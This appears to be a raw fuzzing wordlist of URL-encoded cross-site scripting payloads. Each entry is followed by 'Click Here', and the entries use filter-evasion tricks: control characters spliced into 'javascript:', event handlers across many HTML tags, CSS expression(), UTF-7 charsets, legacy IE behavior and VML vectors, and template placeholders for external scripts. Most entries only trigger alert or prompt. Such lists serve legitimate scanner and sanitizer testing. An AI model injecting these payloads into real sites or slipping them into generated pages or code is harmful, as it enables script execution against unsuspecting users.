ABC%3cdiv%20style%3d%22x%3a%5cxEF%5cxBB%5cxBFexpression(javascript%3aalert(1)%22%3eDEFClick Here

ABC%3cdiv%20style%3d%22x%3a%5cxE2%5cx80%5cx87expression(javascript%3aalert(1)%22%3eDEFClick Here

ABC%3cdiv%20style%3d%22x%3a%5cx0Cexpression(javascript%3aalert(1)%22%3eDEFClick Here

ABC%3cdiv%20style%3d%22x%3a%5cx0Dexpression(javascript%3aalert(1)%22%3eDEFClick Here

ABC%3cdiv%20style%3d%22x%3a%5cxE2%5cx80%5cx8Aexpression(javascript%3aalert(1)%22%3eDEFClick Here

ABC%3cdiv%20style%3d%22x%3a%5cxE2%5cx80%5cx80expression(javascript%3aalert(1)%22%3eDEFClick Here

ABC%3cdiv%20style%3d%22x%3a%5cxC2%5cxA0expression(javascript%3aalert(1)%22%3eDEFClick Here

ABC%3cdiv%20style%3d%22x%3a%5cxE2%5cx80%5cx84expression(javascript%3aalert(1)%22%3eDEFClick Here

ABC%3cdiv%20style%3d%22x%3a%5cxE3%5cx80%5cx80expression(javascript%3aalert(1)%22%3eDEFClick Here

ABC%3cdiv%20style%3d%22x%3a%5cx09expression(javascript%3aalert(1)%22%3eDEFClick Here

ABC%3cdiv%20style%3d%22x%3a%5cx0Aexpression(javascript%3aalert(1)%22%3eDEFClick Here

ABC%3cdiv%20style%3d%22x%3aexp%5cx5Cression(javascript%3aalert(1)%22%3eDEFClick Here

ABC%3cdiv%20style%3d%22x%3aexp%5cx00ression(javascript%3aalert(1)%22%3eDEFClick Here

ABC%3cdiv%20style%3d%22x%3aexpression%5cx00(javascript%3aalert(1)%22%3eDEFClick Here

ABC%3cdiv%20style%3d%22x%3aexpression%5cx5C(javascript%3aalert(1)%22%3eDEFClick Here

ABC%3cdiv%20style%3d%22x%5cx3Aexpression(javascript%3aalert(1)%22%3eDEFClick Here

%3cscript%5cx0Atype%3d%22text%2fjavascript%22%3ejavascript%3aalert(1)%3b%3c%2fscript%3eClick Here

%3cscript%5cx0Ctype%3d%22text%2fjavascript%22%3ejavascript%3aalert(1)%3b%3c%2fscript%3eClick Here

%3cscript%5cx2Ftype%3d%22text%2fjavascript%22%3ejavascript%3aalert(1)%3b%3c%2fscript%3eClick Here

%3cscript%5cx0Dtype%3d%22text%2fjavascript%22%3ejavascript%3aalert(1)%3b%3c%2fscript%3eClick Here

%3cscript%5cx09type%3d%22text%2fjavascript%22%3ejavascript%3aalert(1)%3b%3c%2fscript%3eClick Here

%3cscript%5cx3Etype%3d%22text%2fjavascript%22%3ejavascript%3aalert(1)%3b%3c%2fscript%3eClick Here

%3cscript%20src%3d%22data%3a%5cxCB%5cx8F,javascript%3aalert(1)%22%3e%3c%2fscript%3eClick Here

%3cscript%5cx20type%3d%22text%2fjavascript%22%3ejavascript%3aalert(1)%3b%3c%2fscript%3eClick Here

%3cscript%20src%3d%22data%3a%5cxE0%5cxA4%5cx98,javascript%3aalert(1)%22%3e%3c%2fscript%3eClick Here

%3cscript%20src%3d%22data%3a%5cxD4%5cx8F,javascript%3aalert(1)%22%3e%3c%2fscript%3eClick Here

%3cscript%20src%3d%22data%3atext%2fplain%5cx2Cjavascript%3aalert(1)%22%3e%3c%2fscript%3eClick Here

%22'%60%3e%3c%5cx3Cimg%20src%3dxxx%3ax%20onerror%3djavascript%3aalert(1)%3eClick Here

%22'%60%3e%3c%5cx00img%20src%3dxxx%3ax%20onerror%3djavascript%3aalert(1)%3eClick Here

'%60%22%3e%3c%5cx3Cscript%3ejavascript%3aalert(1)%3c%2fscript%3eClick Here

'%60%22%3e%3c%5cx00script%3ejavascript%3aalert(1)%3c%2fscript%3eClick Here

%3cscript%3eif(%22x%5c%5cxEE%5cxA9%5cx93%22%2elength%3d%3d2)%20%7b%20javascript%3aalert(1)%3b%7d%3c%2fscript%3eClick Here

%3cscript%3eif(%22x%5c%5cxE0%5cxB9%5cx92%22%2elength%3d%3d2)%20%7b%20javascript%3aalert(1)%3b%7d%3c%2fscript%3eClick Here

%253Cscript%253Ealert('XSS')%253C%252Fscript%253EClick Here

%3cscript%3eif(%22x%5c%5cxE1%5cx96%5cx89%22%2elength%3d%3d2)%20%7b%20javascript%3aalert(1)%3b%7d%3c%2fscript%3eClick Here

%22'%60%3eABC%3cdiv%20style%3d%22font-family%3a'foo'%5cx3Bx%3aexpression(javascript%3aalert(1)%3b%2f%2a'%3b%22%3eDEF%20Click Here

%22'%60%3eABC%3cdiv%20style%3d%22font-family%3a'foo'%5cx7Dx%3aexpression(javascript%3aalert(1)%3b%2f%2a'%3b%22%3eDEF%20Click Here

%3cstyle%3e%3c%2fstyle%5cx0D%3cimg%20src%3d%22about%3ablank%22%20onerror%3djavascript%3aalert(1)%2f%2f%3e%3c%2fstyle%3eClick Here

%3cstyle%3e%3c%2fstyle%5cx0A%3cimg%20src%3d%22about%3ablank%22%20onerror%3djavascript%3aalert(1)%2f%2f%3e%3c%2fstyle%3eClick Here

%3cstyle%3e%3c%2fstyle%5cx09%3cimg%20src%3d%22about%3ablank%22%20onerror%3djavascript%3aalert(1)%2f%2f%3e%3c%2fstyle%3eClick Here

%3cstyle%3e%3c%2fstyle%5cx20%3cimg%20src%3d%22about%3ablank%22%20onerror%3djavascript%3aalert(1)%2f%2f%3e%3c%2fstyle%3eClick Here

%3cstyle%3e%3c%2fstyle%5cx3E%3cimg%20src%3d%22about%3ablank%22%20onerror%3djavascript%3aalert(1)%2f%2f%3e%3c%2fstyle%3eClick Here

%3cscript%3e%2f%2a%20%2a%5cx00%2fjavascript%3aalert(1)%2f%2f%20%2a%2f%3c%2fscript%3eClick Here

%3cscript%3e%2f%2a%20%2a%5cx2A%2fjavascript%3aalert(1)%2f%2f%20%2a%2f%3c%2fscript%3eClick Here

%3ca%20href%3d%22javas%5cx06cript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22javas%5cx0Ccript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22javas%5cx0Bcript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22javas%5cx09cript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22javas%5cx01cript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22javas%5cx05cript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22javas%5cx04cript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22javas%5cx03cript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22javas%5cx02cript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22javas%5cx08cript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22javas%5cx0Acript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22javas%5cx0Dcript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22javas%5cx00cript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22javas%5cx07cript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%22'%60%3e%3cp%3e%3csvg%3e%3cscript%3ea%3d'hello%5cx27%3bjavascript%3aalert(1)%2f%2f'%3b%3c%2fscript%3e%3c%2fp%3eClick Here

%60%22'%3e%3cimg%20src%3d'%23%5cx27%20onerror%3djavascript%3aalert(1)%3eClick Here

%3ca%20href%3d%22javascript%5cx3Ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

--%3e%3c!--%20--%5cx00%3e%20%3cimg%20src%3dxxx%3ax%20onerror%3djavascript%3aalert(1)%3e%20--%3eClick Here

--%3e%3c!--%20--%5cx21%3e%20%3cimg%20src%3dxxx%3ax%20onerror%3djavascript%3aalert(1)%3e%20--%3eClick Here

--%3e%3c!--%20--%5cx3E%3e%20%3cimg%20src%3dxxx%3ax%20onerror%3djavascript%3aalert(1)%3e%20--%3eClick Here

--%3e%3c!--%20---%3e%20%3cimg%20src%3dxxx%3ax%20onerror%3djavascript%3aalert(1)%3e%20--%3eClick Here

%3cscript%3ejavascript%3aalert(1)%3c%2fscript%5cx0BClick Here

%3c!--%5cx3E%3cimg%20src%3dxxx%3ax%20onerror%3djavascript%3aalert(1)%3e%20--%3eClick Here

%3cscript%20charset%3d%22%5cx22%3ejavascript%3aalert(1)%3c%2fscript%3eClick Here

%3cscript%3ejavascript%3aalert(1)%3c%2fscript%5cx0AClick Here

%3cscript%3ejavascript%3aalert(1)%3c%2fscript%5cx0DClick Here

'%22%60%3e%3cscript%3e%2f%2a%20%2a%5cx2Fjavascript%3aalert(1)%2f%2f%20%2a%2f%3c%2fscript%3eClick Here

%5cx3Cscript%3ejavascript%3aalert(1)%3c%2fscript%3eClick Here

%3cbody%20onblur%20body%20onblur%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fbody%20onblur%3eClick Here

%3chtml%20onmousemove%20html%20onmousemove%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fhtml%20onmousemove%3eClick Here

%3csvg%20onload%20svg%20onload%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fsvg%20onload%3eClick Here

%3ciframe%20src%20iframe%20src%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fiframe%20src%3eClick Here

%3cbody%20onkeydown%20body%20onkeydown%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fbody%20onkeydown%3eClick Here

%3ciframe%20onbeforeload%20iframe%20onbeforeload%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fiframe%20onbeforeload%3eClick Here

%3cbody%20onbeforeunload%20body%20onbeforeunload%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fbody%20onbeforeunload%3eClick Here

%3cbody%20onfocus%20body%20onfocus%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fbody%20onfocus%3eClick Here

%3cobject%20onbeforeload%20object%20onbeforeload%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fobject%20onbeforeload%3eClick Here

%3chtml%20onmouseover%20html%20onmouseover%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fhtml%20onmouseover%3eClick Here

%3cbody%20onload%20body%20onload%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fbody%20onload%3eClick Here

%3ciframe%20onload%20iframe%20onload%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fiframe%20onload%3eClick Here

%3cbody%20onunload%20body%20onunload%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fbody%20onunload%3eClick Here

%3cbody%20onkeyup%20body%20onkeyup%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fbody%20onkeyup%3eClick Here

%3capplet%20onerror%20applet%20onerror%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fapplet%20onerror%3eClick Here

%3csvg%20onunload%20svg%20onunload%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fsvg%20onunload%3eClick Here

%3cbody%20onpagehide%20body%20onpagehide%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fbody%20onpagehide%3eClick Here

%3capplet%20onreadystatechange%20applet%20onreadystatechange%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fapplet%20onreadystatechange%3eClick Here

%3chtml%20onMouseMove%20html%20onMouseMove%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fhtml%20onMouseMove%3eClick Here

%3cbody%20onPopState%20body%20onPopState%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fbody%20onPopState%3eClick Here

%3cbody%20onResize%20body%20onResize%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fbody%20onResize%3eClick Here

%3cobject%20onError%20object%20onError%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fobject%20onError%3eClick Here

%3cbody%20onMouseMove%20body%20onMouseMove%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fbody%20onMouseMove%3eClick Here

%3chtml%20onMouseOut%20html%20onMouseOut%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fhtml%20onMouseOut%3eClick Here

%3capplet%20onReadyStateChange%20applet%20onReadyStateChange%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fapplet%20onReadyStateChange%3eClick Here

%3csvg%20onUnload%20svg%20onUnload%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fsvg%20onUnload%3eClick Here

%3cmarquee%20onScroll%20marquee%20onScroll%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fmarquee%20onScroll%3eClick Here

%3cframeset%20onBlur%20frameset%20onBlur%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fframeset%20onBlur%3eClick Here

%3cbody%20onBeforeUnload%20body%20onBeforeUnload%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fbody%20onBeforeUnload%3eClick Here

%3cxml%20onPropertyChange%20xml%20onPropertyChange%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fxml%20onPropertyChange%3eClick Here

%3chtml%20onMouseDown%20html%20onMouseDown%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fhtml%20onMouseDown%3eClick Here

%3chtml%20onMouseEnter%20html%20onMouseEnter%3d%22javascript%3aparent%2ejavascript%3aalert(1)%22%3e%3c%2fhtml%20onMouseEnter%3eClick Here

%3chtml%20onMouseOver%20html%20onMouseOver%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fhtml%20onMouseOver%3eClick Here

%3cmarquee%20onStart%20marquee%20onStart%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fmarquee%20onStart%3eClick Here

%3cscript%20onLoad%20script%20onLoad%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fscript%20onLoad%3eClick Here

%3capplet%20onError%20applet%20onError%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fapplet%20onError%3eClick Here

%3cframeset%20onFocus%20frameset%20onFocus%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fframeset%20onFocus%3eClick Here

%3cbody%20onPageShow%20body%20onPageShow%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fbody%20onPageShow%3eClick Here

%3cstyle%20onReadyStateChange%20style%20onReadyStateChange%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fstyle%20onReadyStateChange%3eClick Here

%3ciframe%20onReadyStateChange%20iframe%20onReadyStateChange%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fiframe%20onReadyStateChange%3eClick Here

%3cstyle%20onLoad%20style%20onLoad%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fstyle%20onLoad%3eClick Here

%3chtml%20onMouseLeave%20html%20onMouseLeave%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fhtml%20onMouseLeave%3eClick Here

%3chtml%20onMouseWheel%20html%20onMouseWheel%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fhtml%20onMouseWheel%3eClick Here

%3cbgsound%20onPropertyChange%20bgsound%20onPropertyChange%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fbgsound%20onPropertyChange%3eClick Here

%3cbody%20onLoad%20body%20onLoad%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fbody%20onLoad%3eClick Here

%3cbody%20onUnload%20body%20onUnload%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fbody%20onUnload%3eClick Here

%3cbody%20onMouseOver%20body%20onMouseOver%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fbody%20onMouseOver%3eClick Here

%3csvg%20onLoad%20svg%20onLoad%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fsvg%20onLoad%3eClick Here

%3cbody%20onPageHide%20body%20onPageHide%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fbody%20onPageHide%3eClick Here

%3cbody%20onPropertyChange%20body%20onPropertyChange%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fbody%20onPropertyChange%3eClick Here

%3chtml%20onMouseUp%20html%20onMouseUp%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fhtml%20onMouseUp%3eClick Here

%3cframeset%20onScroll%20frameset%20onScroll%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fframeset%20onScroll%3eClick Here

%3cscript%20onReadyStateChange%20script%20onReadyStateChange%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fscript%20onReadyStateChange%3eClick Here

%3cbody%20onFocus%20body%20onFocus%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fbody%20onFocus%3eClick Here

%3cbody%20onMouseEnter%20body%20onMouseEnter%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fbody%20onMouseEnter%3eClick Here

%3ciframe%20onLoad%20iframe%20onLoad%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fiframe%20onLoad%3eClick Here

%3ctitle%20onPropertyChange%20title%20onPropertyChange%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2ftitle%20onPropertyChange%3eClick Here

%3cimage%2fsrc%2fonerror%3dprompt(8)%3eClick Here

%3csvg%20onResize%20svg%20onResize%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3c%2fsvg%20onResize%3eClick Here

%3cimage%20src%3d1%20href%3d1%20onerror%3d%22javascript%3aalert(1)%22%3e%3c%2fimage%3eClick Here

%3cobject%20src%3d1%20href%3d1%20onerror%3d%22javascript%3aalert(1)%22%3e%3c%2fobject%3eClick Here

%3cscript%20src%3d1%20href%3d1%20onerror%3d%22javascript%3aalert(1)%22%3e%3c%2fscript%3eClick Here

%3cbody%20src%3d1%20href%3d1%20onerror%3d%22javascript%3aalert(1)%22%3e%3c%2fbody%3eClick Here

%3caudio%20src%3d1%20href%3d1%20onerror%3d%22javascript%3aalert(1)%22%3e%3c%2faudio%3eClick Here

%3cvideo%20src%3d1%20href%3d1%20onerror%3d%22javascript%3aalert(1)%22%3e%3c%2fvideo%3eClick Here

%22onclick%3dprompt(8)%3e%3csvg%2fonload%3dprompt(8)%3e%22@x%2eyClick Here

%3cimg%20src%3d1%20href%3d1%20onerror%3d%22javascript%3aalert(1)%22%3e%3c%2fimg%3eClick Here

'%60%22%3e%3c%5cx3Cscript%3ejavascript%3aalert(1)%3c%2fscript%3e%20%20%20%20%20%20%20%20Click Here

'%60%22%3e%3c%5cx00script%3ejavascript%3aalert(1)%3c%2fscript%3eClick Here

%3cscript%5cx0Atype%3d%22text%2fjavascript%22%3ejavascript%3aalert(1)%3b%3c%2fscript%3eClick Here

%3cscript%5cx2Ftype%3d%22text%2fjavascript%22%3ejavascript%3aalert(1)%3b%3c%2fscript%3eClick Here

%3cscript%5cx0Ctype%3d%22text%2fjavascript%22%3ejavascript%3aalert(1)%3b%3c%2fscript%3eClick Here

%3cscript%5cx09type%3d%22text%2fjavascript%22%3ejavascript%3aalert(1)%3b%3c%2fscript%3eClick Here

%3cscript%5cx0Dtype%3d%22text%2fjavascript%22%3ejavascript%3aalert(1)%3b%3c%2fscript%3eClick Here

%3cscript%5cx20type%3d%22text%2fjavascript%22%3ejavascript%3aalert(1)%3b%3c%2fscript%3eClick Here

%3c%2fscrip%3c%2fscript%3et%3e%3cimg%20src%20%3dq%20onerror%3dprompt(8)%3eClick Here

%3cscript%5cx3Etype%3d%22text%2fjavascript%22%3ejavascript%3aalert(1)%3b%3c%2fscript%3eClick Here

%3cimg%20src%20%3dq%20onerror%3dprompt(8)%3eClick Here

%3cimage%20src%20%3dq%20onerror%3dprompt(8)%3eClick Here

%3cimg%20src%2fonerror%3dprompt(8)%3eClick Here

%3cdiv%20id%3d%22x%22%3eXXX%3c%2fdiv%3e%20%3cstyle%3e%20%20%23x%7bfont-family%3afoo[bar%3bcolor%3agreen%3b%7d%20%20%23y]%3bcolor%3ared%3b%7b%7d%20%20%3c%2fstyle%3eClick Here

%3cdiv%20style%3d%22background%3aurl(%2ff%23%26%23127%3boo%2f%3bcolor%3ared%2f%2a%2ffoo%2ejpg)%3b%22%3eXClick Here

%3cdiv%20style%3d%22font-family%3afoo%7bbar%3bbackground%3aurl(http%3a%2f%2ffoo%2ef%2foo%7d%3bcolor%3ared%2f%2a%2ffoo%2ejpg)%3b%22%3eXClick Here

%3cx%20style%3d%22background%3aurl('x%26%231%3b%3bcolor%3ared%3b%2f%2a')%22%3eXXX%3c%2fx%3eClick Here

%3cscript%3e(%7bset%2f%2a%2a%2f$($)%7b_%2f%2a%2a%2fsetter%3d$,_%3djavascript%3aalert(1)%7d%7d)%2e$%3deval%3c%2fscript%3eClick Here

%3cscript%3e(%7b0%3a%230%3deval%2f%230%23%2f%230%23(javascript%3aalert(1))%7d)%3c%2fscript%3eClick Here

%3cscript%3eObject%2e__noSuchMethod__%20%3d%20Function,[%7b%7d][0]%2econstructor%2e_('javascript%3aalert(1)')()%3c%2fscript%3eClick Here

%3cscript%3eReferenceError%2eprototype%2e__defineGetter__('name',%20function()%7bjavascript%3aalert(1)%7d),x%3c%2fscript%3eClick Here

%3cmeta%20charset%3d%22x-imap4-modified-utf7%22%3e%26ADz%26AGn%26AG0%26AEf%26ACA%26AHM%26AHI%26AGO%26AD0%26AGn%26ACA%26AG8Abg%26AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ%26ACAAPABiClick Here

%3cmeta%20charset%3d%22x-imap4-modified-utf7%22%3e%26%3cscript%26S1%26TS%261%3ealert%26A7%26(1)%26R%26UA%3b%26%26%3c%26A9%2611%2fscript%26X%26%3eClick Here

X%3cx%20style%3d%60behavior%3aurl(%23default%23time2)%60%20onbegin%3d%60javascript%3aalert(1)%60%20%3eClick Here

1%3cset%2fxmlns%3d%60urn%3aschemas-microsoft-com%3atime%60%20style%3d%60beh%26%23x41vior%3aurl(%23default%23time2)%60%20attributename%3d%60innerhtml%60%20to%3d%60%26lt%3bimg%2fsrc%3d%26quot%3bx%26quot%3bonerror%3djavascript%3aalert(1)%26gt%3b%60%3eClick Here

1%3canimate%2fxmlns%3durn%3aschemas-microsoft-com%3atime%20style%3dbehavior%3aurl(%23default%23time2)%20attributename%3dinnerhtml%20values%3d%26lt%3bimg%2fsrc%3d%26quot%3b%2e%26quot%3bonerror%3djavascript%3aalert(1)%26gt%3b%3eClick Here

%3cvmlframe%20xmlns%3durn%3aschemas-microsoft-com%3avml%20style%3dbehavior%3aurl(%23default%23vml)%3bposition%3aabsolute%3bwidth%3a100%%3bheight%3a100%%20src%3d%(vml)s%23xss%3e%3c%2fvmlframe%3eClick Here

%3ca%20style%3d%22behavior%3aurl(%23default%23AnchorClick)%3b%22%20folder%3d%22javascript%3ajavascript%3aalert(1)%22%3eXXX%3c%2fa%3eClick Here

%3cxml%20id%3d%22xss%22%20src%3d%22%(htc)s%22%3e%3c%2fxml%3e%20%3clabel%20dataformatas%3d%22html%22%20datasrc%3d%22%23xss%22%20datafld%3d%22payload%22%3e%3c%2flabel%3eClick Here

%3cx%20style%3d%22behavior%3aurl(%(sct)s)%22%3eClick Here

%3cevent-source%20src%3d%22%(event)s%22%20onload%3d%22javascript%3aalert(1)%22%3eClick Here

%3ca%20href%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3cevent-source%20src%3d%22data%3aapplication%2fx-dom-event-stream,Event%3aclick%0Adata%3aXXX%0A%0A%22%3eClick Here

%3cscript%20src%3d%(jscript)s%3e%3c%2fscript%3eClick Here

%3cscript%3e%(payload)s%3c%2fscript%3eClick Here

%3cscript%3ejavascript%3aalert(1)%3c%2fscript%3eClick Here

%3cIMG%20SRC%3d%22javascript%3ajavascript%3aalert(1)%3b%22%3eClick Here

%3cscript%20language%3d'javascript'%20src%3d'%(jscript)s'%3e%3c%2fscript%3eClick Here

%3cIMG%20SRC%3d%60javascript%3ajavascript%3aalert(1)%60%3eClick Here

%3cIMG%20SRC%3djavascript%3ajavascript%3aalert(1)%3eClick Here

%3cSCRIPT%20SRC%3d%(jscript)s%3f%3cB%3eClick Here

%3cBODY%20ONLOAD%3djavascript%3aalert(1)%3eClick Here

%3cFRAMESET%3e%3cFRAME%20SRC%3d%22javascript%3ajavascript%3aalert(1)%3b%22%3e%3c%2fFRAMESET%3eClick Here

%3cBODY%20ONLOAD%3djavascript%3ajavascript%3aalert(1)%3eClick Here

%3cBODY%20onload!%23$%%%26()%2a~%2b-_%2e,%3a%3b%3f@[%2f%7c%5c]%5e%60%3djavascript%3aalert(1)%3eClick Here

%3cIMG%20SRC%3d%22jav%20%20%20%20ascript%3ajavascript%3aalert(1)%3b%22%3eClick Here

%3c%3cSCRIPT%3e%(payload)s%2f%2f%3c%3c%2fSCRIPT%3eClick Here

%3cSCRIPT%2fSRC%3d%22%(jscript)s%22%3e%3c%2fSCRIPT%3eClick Here

%3cIMG%20SRC%3d%22javascript%3ajavascript%3aalert(1)%22Click Here

%3cINPUT%20TYPE%3d%22IMAGE%22%20SRC%3d%22javascript%3ajavascript%3aalert(1)%3b%22%3eClick Here

%3ciframe%20src%3d%(scriptlet)s%20%3cClick Here

%3cIMG%20DYNSRC%3d%22javascript%3ajavascript%3aalert(1)%22%3eClick Here

%3cIMG%20LOWSRC%3d%22javascript%3ajavascript%3aalert(1)%22%3eClick Here

%3cBGSOUND%20SRC%3d%22javascript%3ajavascript%3aalert(1)%3b%22%3eClick Here

%3cBR%20SIZE%3d%22%26%7bjavascript%3aalert(1)%7d%22%3eClick Here

%3cLINK%20REL%3d%22stylesheet%22%20HREF%3d%22javascript%3ajavascript%3aalert(1)%3b%22%3eClick Here

%3cLAYER%20SRC%3d%22%(scriptlet)s%22%3e%3c%2fLAYER%3eClick Here

%3cSTYLE%3e@import'%(css)s'%3b%3c%2fSTYLE%3eClick Here

%3cMETA%20HTTP-EQUIV%3d%22Link%22%20Content%3d%22%3c%(css)s%3e%3b%20REL%3dstylesheet%22%3eClick Here

%3cXSS%20STYLE%3d%22behavior%3a%20url(%(htc)s)%3b%22%3eClick Here

%3cMETA%20HTTP-EQUIV%3d%22refresh%22%20CONTENT%3d%220%3burl%3djavascript%3ajavascript%3aalert(1)%3b%22%3eClick Here

%3cSTYLE%3eli%20%7blist-style-image%3a%20url(%22javascript%3ajavascript%3aalert(1)%22)%3b%7d%3c%2fSTYLE%3e%3cUL%3e%3cLI%3eXSSClick Here

%3cMETA%20HTTP-EQUIV%3d%22refresh%22%20CONTENT%3d%220%3b%20URL%3dhttp%3a%2f%2f%3bURL%3djavascript%3ajavascript%3aalert(1)%3b%22%3eClick Here

%3cIFRAME%20SRC%3d%22javascript%3ajavascript%3aalert(1)%3b%22%3e%3c%2fIFRAME%3eClick Here

%3cTABLE%3e%3cTD%20BACKGROUND%3d%22javascript%3ajavascript%3aalert(1)%22%3eClick Here

%3cTABLE%20BACKGROUND%3d%22javascript%3ajavascript%3aalert(1)%22%3eClick Here

%3cDIV%20STYLE%3d%22background-image%3a%20url(javascript%3ajavascript%3aalert(1))%22%3eClick Here

%3cIMG%20STYLE%3d%22xss%3aexpr%2f%2aXSS%2a%2fession(javascript%3aalert(1))%22%3eClick Here

%3cDIV%20STYLE%3d%22width%3aexpression(javascript%3aalert(1))%3b%22%3eClick Here

%3cXSS%20STYLE%3d%22xss%3aexpression(javascript%3aalert(1))%22%3eClick Here

%3cSTYLE%20TYPE%3d%22text%2fjavascript%22%3ejavascript%3aalert(1)%3b%3c%2fSTYLE%3eClick Here

%3cSTYLE%3e%2eXSS%7bbackground-image%3aurl(%22javascript%3ajavascript%3aalert(1)%22)%3b%7d%3c%2fSTYLE%3e%3cA%20CLASS%3dXSS%3e%3c%2fA%3eClick Here

%3cSTYLE%20type%3d%22text%2fcss%22%3eBODY%7bbackground%3aurl(%22javascript%3ajavascript%3aalert(1)%22)%7d%3c%2fSTYLE%3eClick Here

%3cBASE%20HREF%3d%22javascript%3ajavascript%3aalert(1)%3b%2f%2f%22%3eClick Here

%3cOBJECT%20TYPE%3d%22text%2fx-scriptlet%22%20DATA%3d%22%(scriptlet)s%22%3e%3c%2fOBJECT%3eClick Here

%3c!--[if%20gte%20IE%204]%3e%3cSCRIPT%3ejavascript%3aalert(1)%3b%3c%2fSCRIPT%3e%3c![endif]--%3eClick Here

%3cOBJECT%20classid%3dclsid%3aae24fdae-03c6-11d1-8b76-0080c744f389%3e%3cparam%20name%3durl%20value%3djavascript%3ajavascript%3aalert(1)%3e%3c%2fOBJECT%3eClick Here

%3cSCRIPT%20SRC%3d%22%(jpg)s%22%3e%3c%2fSCRIPT%3eClick Here

%3cHEAD%3e%3cMETA%20HTTP-EQUIV%3d%22CONTENT-TYPE%22%20CONTENT%3d%22text%2fhtml%3b%20charset%3dUTF-7%22%3e%20%3c%2fHEAD%3e%2bADw-SCRIPT%2bAD4-%(payload)s%3b%2bADw-%2fSCRIPT%2bAD4-Click Here

